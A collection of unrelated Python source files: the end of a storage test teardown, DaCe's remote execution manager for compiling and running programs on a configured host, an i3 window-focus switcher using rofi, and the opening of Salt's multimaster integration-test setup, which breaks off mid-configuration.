if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
|
remote_execution.py
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import multiprocessing
import os
import sys
import stat
import tempfile
import traceback
import subprocess
import runpy
from typing import List, Callable, Any, AnyStr
from string import Template
from dace.sdfg import SDFG
from dace.codegen.compiler import generate_program_folder, configure_and_compile
from dace.codegen.codegen import CodeObject
from dace.config import Config
def _task(obj):
obj.run()
class FunctionStreamWrapper(object):
""" Class that wraps around a function with a stream-like API (write). """
def __init__(self, *funcs: Callable[[AnyStr], Any]):
self.funcs = funcs
def write(self, *args, **kwargs):
for func in self.funcs:
func(' '.join(args), **kwargs)
def flush(self):
pass
def _output_feeder(terminal: multiprocessing.Queue, output: AnyStr):
if isinstance(output, str):
# It's already in a usable format
pass
else:
try:
output = output.decode('utf-8')
except UnicodeDecodeError:
# Try again escaping
output = output.decode('unicode_escape')
terminal.put(output)
class Executor(object):
""" DaCe program execution management class for DIODE. """
def __init__(self, remote, async_host=None):
self.counter = 0
self.remote = remote
self.exit_on_error = True
self.running_async = async_host is not None
self.async_host = async_host
self._config = None
self.output_queue = None
def set_exit_on_error(self, do_exit):
self.exit_on_error = do_exit
def set_config(self, config):
self._config = config
def config_get(self, *key_hierarchy):
if self._config is None:
return Config.get(*key_hierarchy)
else:
return self._config.get(*key_hierarchy)
@staticmethod
def _use_mpi(code_objects: List[CodeObject]):
# Figure out whether we should use MPI for launching
for code_object in code_objects:
if code_object.target.target_name == 'mpi':
return True
return False
def run(self, dace_state, fail_on_nonzero=False):
sdfg = dace_state.get_sdfg()
if self.remote:
self.show_output("Executing DaCe program " + sdfg.name + " on " +
self.config_get("execution", "general", "host") + "\n")
self.run_remote(sdfg, dace_state, fail_on_nonzero)
else:
self.show_output("Executing DaCe program " + sdfg.name + " locally\n")
self.run_local(sdfg, dace_state.get_dace_tmpfile())
def run_local(self, sdfg: SDFG, driver_file: str):
workdir = sdfg.build_folder
if Config.get_bool('diode', 'general', 'library_autoexpand'):
sdfg.expand_library_nodes()
code_objects = sdfg.generate_code()
use_mpi = Executor._use_mpi(code_objects)
# TODO: Implement (instead of pyrun, use mpirun/mpiexec)
if use_mpi:
raise NotImplementedError('Running MPI locally unimplemented')
# Pipe stdout/stderr back to client output
stdout = sys.stdout
stderr = sys.stderr
sys.stdout = FunctionStreamWrapper(self.show_output, stdout.write)
sys.stderr = FunctionStreamWrapper(self.show_output, stderr.write)
# Compile SDFG
generate_program_folder(sdfg, code_objects, workdir, self._config)
configure_and_compile(workdir, sdfg.name)
self.show_output("Running script\n")
# Run driver script with the compiled SDFG(s) as the default
old_usecache = Config.get_bool('compiler', 'use_cache')
Config.set('compiler', 'use_cache', value=True)
try:
runpy.run_path(driver_file, run_name='__main__')
# Catching all exceptions, including SystemExit
except (Exception, SystemExit) as ex:
# Corner case: If exited with error code 0, it is a success
if isinstance(ex, SystemExit):
# If the exit code is nonzero, "raise" will not trigger a
# printout on the server
if ex.code != 0:
traceback.print_exc()
raise
else:
raise
self.show_output("Execution Terminated\n")
# Revert configuration and output redirection
Config.set('compiler', 'use_cache', value=old_usecache)
sys.stdout = stdout
sys.stderr = stderr
def run_remote(self, sdfg: SDFG, dace_state, fail_on_nonzero: bool):
dace_progname = sdfg.name
code_objects = sdfg.generate_code()
use_mpi = Executor._use_mpi(code_objects)
remote_workdir = self.config_get("execution", "general", "workdir")
remote_base_path = self.config_get('default_build_folder')
remote_dace_dir = os.path.join(remote_workdir, remote_base_path, dace_progname)
try:
tmpfolder = tempfile.mkdtemp()
generate_program_folder(sdfg, code_objects, tmpfolder, config=self._config)
self.create_remote_directory(remote_dace_dir)
self.copy_folder_to_remote(tmpfolder, remote_dace_dir)
# call compile.py on the remote node in the copied folder
self.remote_compile(remote_dace_dir, dace_progname)
# copy the input file and the .so file (with the right name)
# to remote_dace_dir
so_name = "lib" + dace_progname + "." + self.config_get('compiler', 'library_extension')
self.copy_file_from_remote(os.path.join(remote_dace_dir, 'build', so_name),
os.path.join(tmpfolder, so_name))
self.copy_file_to_remote(os.path.join(tmpfolder, so_name), remote_dace_dir)
dace_file = dace_state.get_dace_tmpfile()
if dace_file is None:
raise ValueError("Dace file is None!")
remote_dace_file = os.path.join(remote_workdir, os.path.basename(dace_file))
self.copy_file_to_remote(dace_file, remote_dace_file)
self.remote_exec_dace(remote_workdir,
remote_dace_file,
use_mpi,
fail_on_nonzero,
repetitions=dace_state.repetitions)
self.show_output("Execution Terminated\n")
try:
self.copy_file_from_remote(remote_workdir + "/results.log", ".")
except RuntimeError:
pass
# Copy back the instrumentation and vectorization results
try:
self.copy_folder_from_remote(os.path.join(remote_dace_dir, 'perf'), ".")
except RuntimeError:
pass
try:
self.remote_delete_file(remote_workdir + "/results.log")
except RuntimeError:
pass
self.remote_delete_file(remote_dace_file)
self.remote_delete_dir(remote_dace_dir)
except: # Running a custom script (the driver file), which can raise
# any exception
self.show_output(traceback.format_exc())
raise
self.counter += 1
def show_output(self, outstr):
""" Displays output of any ongoing compilation or computation. """
if self.output_queue is not None:
# Pipe the output
_output_feeder(self.output_queue, outstr)
return
if isinstance(outstr, str):
print(outstr, end="", flush=True)
return
sys.stdout.buffer.write(outstr)
def remote_delete_file(self, delfile):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command="rm " + delfile)
self.exec_cmd_and_show_output(cmd)
def remote_delete_dir(self, deldir):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command="rm -r " + deldir)
self.exec_cmd_and_show_output(cmd)
def delete_local_folder(self, path):
os.removedirs(path)
def remote_exec_dace(self,
remote_workdir,
dace_file,
use_mpi=True,
fail_on_nonzero=False,
omp_num_threads=None,
additional_options_dict=None,
repetitions=None):
additional_options_dict = additional_options_dict or {}
run = "${command} "
if use_mpi == True:
run = self.config_get("execution", "mpi", "mpiexec")
nprocs = self.config_get("execution", "mpi", "num_procs")
else:
nprocs = 1
repetitions = (repetitions or self.config_get("execution", "general", "repetitions"))
omp_num_threads_str = ""
omp_num_threads_unset_str = ""
perf_instrumentation_result_marker = ""
if omp_num_threads is not None:
omp_num_threads_str = "export OMP_NUM_THREADS=" + str(omp_num_threads) + "\n"
omp_num_threads_unset_str = "unset OMP_NUM_THREADS\n"
perf_instrumentation_result_marker = "echo '# ;%s; Running in multirun config' >> %s/instrumentation_results.txt\n" % (
omp_num_threads_str.replace("\n", ""), remote_workdir)
# Create string from all misc options
miscoptstring = ""
miscoptresetstring = ""
for optkey, optval in additional_options_dict.items():
miscoptstring += "export " + str(optkey) + "=" + str(optval) + "\n"
miscoptresetstring += "unset " + str(optkey) + "\n"
# Create a startscript which exports necessary env-vars
start_sh = "set -x\n" + \
"export DACE_compiler_use_cache=1\n" + \
"export DACE_optimizer_interface=''\n" + \
"export DACE_profiling=1\n" + \
"export DACE_treps=" + str(repetitions) +"\n" + \
miscoptstring + \
omp_num_threads_str + \
"cd " + remote_workdir + "\n" + \
perf_instrumentation_result_marker
s = Template(run + " ")
cmd = s.substitute(command="python3 " + dace_file, num_procs=nprocs)
start_sh += cmd + "\n"
start_sh += "export RETVAL=$?\n"
start_sh += (
"unset DACE_compiler_use_cache\n" + "unset DACE_optimizer_interface\n" + "unset DACE_treps\n" +
"unset DACE_profiling\n" + omp_num_threads_unset_str + miscoptresetstring +
# TODO: separate program error and system error
"exit $RETVAL\n")
tempdir = tempfile.mkdtemp()
startsh_file = os.path.join(tempdir, "start.sh")
fh = open(startsh_file, "w")
fh.write(start_sh)
fh.close()
st = os.stat(startsh_file)
os.chmod(startsh_file, st.st_mode | stat.S_IEXEC)
workdir = self.config_get("execution", "general", "workdir")
self.copy_file_to_remote(startsh_file, self.config_get("execution", "general", "workdir") + "/start.sh")
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=workdir + "/start.sh")
self.exec_cmd_and_show_output(cmd, fail_on_nonzero)
self.remote_delete_file(workdir + "/start.sh")
def remote_compile(self, rem_path, dace_progname):
compile_cmd = "python3 -m dace.codegen.compiler " + str(rem_path) + " " + dace_progname
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=compile_cmd)
self.exec_cmd_and_show_output(cmd)
def create_remote_directory(self, path):
""" Creates a path on a remote node.
:note: We use `mkdir -p` for now, which is not portable.
"""
mkdircmd = "mkdir -p " + path
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=mkdircmd)
self.exec_cmd_and_show_output(cmd)
def copy_file_to_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_l2r"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile=src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def copy_folder_to_remote(self, src, dst):
for root, subdirs, files in os.walk(src):
for filename in files:
file_path = os.path.join(root, filename)
self.copy_file_to_remote(file_path, dst + "/" + filename)
for subdir in subdirs:
self.create_remote_directory(dst + "/" + str(subdir))
self.copy_folder_to_remote(src + "/" + str(subdir), dst + "/" + str(subdir))
return
def copy_folder_from_remote(self, src: str, dst: str):
s = Template(self.config_get("execution", "general", "copycmd_r2l"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile="-r " + src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def copy_file_from_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_r2l"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile=src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def exec_cmd_and_show_output(self, cmd, fail_on_nonzero=True):
self.show_output(cmd + "\n")
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
out = p.stdout.read(1)
if out == '' or out == b'':
break
if out != '' and out != b'':
self.show_output(out)
stdout, _ = p.communicate(timeout=60)
self.show_output(stdout)
if p.returncode != 0 and fail_on_nonzero:
print("The command " + cmd + " failed (retcode " +\
str(p.returncode) + ")!\n")
if self.exit_on_error:
os._exit(p.returncode)
else:
raise RuntimeError("The command " + cmd + " failed (retcode " + \
str(p.returncode) + ")!")
class AsyncExecutor:
""" Asynchronous remote execution. """
def __init__(self, remote):
self.executor = Executor(remote)
self.executor.set_exit_on_error(False)
self.to_proc_message_queue = multiprocessing.Queue(128)
self.running_proc = None
# This determines if a "quit"-message stops the subprocess
self.autoquit = True
self.sync_run_lock = multiprocessing.Lock()
def run_sync(self, func):
# Synchronize using a lock
def deferred():
with self.sync_run_lock:
func()
return False
deferred()
def run_async(self, dace_state, fail_on_nonzero=False):
if self.running_proc is not None and self.running_proc.is_alive():
print("Cannot start another sub-process!")
return
# Use multiple processes to handle crashing processes
self.running_proc = multiprocessing.Process(target=_task, args=(self, ))
self.running_proc.start()
self.append_run_async(dace_state, fail_on_nonzero=False)
def append_run_async(self, dace_state, fail_on_nonzero=False):
self.to_proc_message_queue.put(("run", (dace_state.dace_code, dace_state.dace_filename, dace_state.source_code,
dace_state.sdfg.to_json(), dace_state.remote), fail_on_nonzero))
def add_async_task(self, task):
self.to_proc_message_queue.put(("execute_task", self, task))
def execute_task(self, task):
return task()
def callMethod(self, obj, name, *args):
# Shortcut for executing a simple task
if name == "execute_task":
_, subargs = args
return self.execute_task(subargs)
elif name == "run":
# Convert arguments back to dace_state, deserializing the SDFG
from diode.DaceState import DaceState
dace_state = DaceState(args[0][0], args[0][1], args[0][2], SDFG.from_json(args[0][3]), args[0][4])
args = (dace_state, *args[1:])
return getattr(obj, name)(*args)
def run(self):
while True:
# Read a message (blocking)
msg = self.to_proc_message_queue.get()
if msg == "quit":
if self.to_proc_message_queue.empty() and self.autoquit:
print("Quitting async execution")
break
else:
# There still is some queued work.
continue
if msg == "forcequit":
break
# Unwrap and call
self.callMethod(self.executor, *msg)
def join(self, timeout=None):
pass
|
i3lasts.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
from argparse import ArgumentParser
import i3ipc
import dynmen
from shlex import split
import collections
import sys
SOCKET_FILE = '/tmp/i3_focus_last'
MAX_WIN_HISTORY = 15
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self.on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
if os.path.exists(SOCKET_FILE):
os.remove(SOCKET_FILE)
self.listening_socket.bind(SOCKET_FILE)
self.listening_socket.listen(1)
self.window_list = []
self.window_list_lock = threading.RLock()
def on_window_focus(self, i3conn, event):
with self.window_list_lock:
window_id = event.container.id
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def launch_i3(self):
self.i3.main()
def launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
selector.register(conn, selectors.EVENT_READ, read)
def read(conn):
data = conn.recv(1024)
if data == b'switch':
with self.window_list_lock:
tree = self.i3.get_tree()
windows = set(w.id for w in tree.leaves())
coll = []
for window_id, win_n in zip( self.window_list, range(len(self.window_list)) ):
if window_id not in windows:
self.window_list.remove(window_id)
else:
win = tree.find_by_id(window_id)
coll.append(("w{} d{:<4} | {}".format(win_n, win.workspace().name, win.name),
window_id))
rofi = dynmen.Menu(split('rofi -dmenu -i -p \'> \'') + self.args)
print(coll)
try:
result = rofi(collections.OrderedDict(coll[1:]))
self.i3.command('[con_id=%s] focus' % result.value)
except dynmen.MenuError:
result = None
print("no selection")
elif not data:
selector.unregister(conn)
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
def run(self, args):
self.args = args
t_i3 = threading.Thread(target=self.launch_i3)
t_server = threading.Thread(target=self.launch_server)
for t in (t_i3, t_server):
t.start()
def server():
args = sys.argv[1:]
focus_watcher = FocusWatcher()
focus_watcher.run(args)
def client():
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect(SOCKET_FILE)
client_socket.send(b'switch')
client_socket.close()
if __name__ == '__main__':
server()
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt multimaster test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import copy
import logging
import os
import shutil
import stat
import sys
import threading
import time
from collections import OrderedDict
# Import salt tests support dirs
from tests.support.paths import (
ENGINES_DIR,
FILES,
INTEGRATION_TEST_DIR,
LOG_HANDLERS_DIR,
SCRIPT_DIR,
TMP,
)
from tests.support.runtests import RUNTIME_VARS
from tests.support.parser import PNUM, print_header
from tests.support.processes import start_daemon
# Import Salt libs
from tests.integration import (
SocketServerRequestHandler,
TestDaemon,
TestDaemonStartFailed,
ThreadedSocketServer,
get_unused_localhost_port,
)
import salt.config
import salt.log.setup as salt_log_setup
import salt.utils.path
import salt.utils.platform
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion
log = logging.getLogger(__name__)
SALT_LOG_PORT = get_unused_localhost_port()
class MultimasterTestDaemon(TestDaemon):
'''
Set up the master and minion daemons, and run related cases
'''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.mm_master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
self.master_targets = [self.mm_master_opts, self.mm_sub_master_opts]
self.minion_targets = set(['mm-minion', 'mm-sub-minion'])
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'raet':
self.start_raet_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
#if getattr(self.parser.options, 'ssh', False):
#self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.mm_minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
try:
if hasattr(self.sub_minion_process, 'terminate'):
self.sub_minion_process.terminate()
else:
log.error('self.sub_minion_process can\'t be terminate.')
except AttributeError:
pass
try:
if hasattr(self.minion_process, 'terminate'):
self.minion_process.terminate()
else:
log.error('self.minion_process can\'t be terminate.')
except AttributeError:
pass
try:
if hasattr(self.sub_master_process, 'terminate'):
self.sub_master_process.terminate()
else:
log.error('self.sub_master_process can\'t be terminate.')
except AttributeError:
pass
try:
if hasattr(self.master_process, 'terminate'):
self.master_process.terminate()
else:
log.error('self.master_process can\'t be terminate.')
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.mm_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.mm_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
# Clone the master key to sub-master's pki dir
for keyfile in ('master.pem', 'master.pub'):
shutil.copyfile(
os.path.join(self.mm_master_opts['pki_dir'], keyfile),
os.path.join(self.mm_sub_master_opts['pki_dir'], keyfile)
)
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting second salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_master_process = start_daemon(
daemon_name='sub salt-master',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='sub-salt-master/{}'.format(self.mm_sub_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.mm_sub_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_SUB_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting second salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting second salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.mm_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.mm_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.mm_sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.mm_sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_SUB_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def wait_for_minions(self, start, timeout, sleep=5):
'''
Ensure all minions and masters (including sub-masters) are connected.
'''
success = [False] * len(self.master_targets)
while True:
for num, client in enumerate(self.clients):
if success[num]:
continue
try:
ret = self.client.run_job('*', 'test.ping')
except salt.exceptions.SaltClientError:
ret = None
if ret and 'minions' not in ret:
continue
if ret and sorted(ret['minions']) == sorted(self.minion_targets):
success[num] = True
continue
if all(success):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
@property
def clients(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
if 'runtime_clients' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_clients'] = OrderedDict()
runtime_clients = RUNTIME_VARS.RUNTIME_CONFIGS['runtime_clients']
for mopts in self.master_targets:
if mopts['id'] in runtime_clients:
continue
runtime_clients[mopts['id']] = salt.client.get_local_client(mopts=mopts)
return runtime_clients
@property
def client(self):
return self.clients['mm-master']
@classmethod
def transplant_configs(cls, transport='zeromq'):
os.makedirs(RUNTIME_VARS.TMP_MM_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR)
print(' * Transplanting multimaster configuration files to \'{0}\''.format(
RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
# Primary master in multimaster environment
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_master')))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['config_dir'] = RUNTIME_VARS.TMP_MM_CONF_DIR
master_opts['root_dir'] = os.path.join(TMP, 'rootdir-multimaster')
master_opts['pki_dir'] = 'pki'
file_tree = {
'root_dir': os.path.join(FILES, 'pillar', 'base', 'file_tree'),
'follow_dir_links': False,
'keep_newline': True,
}
master_opts['ext_pillar'].append({'file_tree': file_tree})
# Secondary master in multimaster environment
sub_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
sub_master_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_sub_master')))
sub_master_opts['known_hosts_file'] = tests_known_hosts_file
sub_master_opts['cachedir'] = 'cache'
sub_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_master_opts['config_dir'] = RUNTIME_VARS.TMP_MM_SUB_CONF_DIR
sub_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-multimaster')
sub_master_opts['pki_dir'] = 'pki'
sub_master_opts['ext_pillar'].append({'file_tree': copy.deepcopy(file_tree)})
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(real_prefix, 'Scripts', 'virtualenv.exe')
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get('PATH')
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ['PATH'] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which('virtualenv')
if path is not None:
# Restore previous environ PATH
os.environ['PATH'] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to both masters
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_minion')))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['config_dir'] = RUNTIME_VARS.TMP_MM_CONF_DIR
minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-multimaster')
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
if virtualenv_binary:
minion_opts['venv_bin'] = virtualenv_binary
# This sub_minion also connects to both masters
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_sub_minion')))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_MM_SUB_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-multimaster')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
if virtualenv_binary:
sub_minion_opts['venv_bin'] = virtualenv_binary
if transport == 'raet':
master_opts['transport'] = 'raet'
master_opts['raet_port'] = 64506
sub_master_opts['transport'] = 'raet'
sub_master_opts['raet_port'] = 64556
minion_opts['transport'] = 'raet'
minion_opts['raet_port'] = 64510
sub_minion_opts['transport'] = 'raet'
sub_minion_opts['raet_port'] = 64520
# syndic_master_opts['transport'] = 'raet'
if transport == 'tcp':
master_opts['transport'] = 'tcp'
sub_master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = sub_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = sub_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
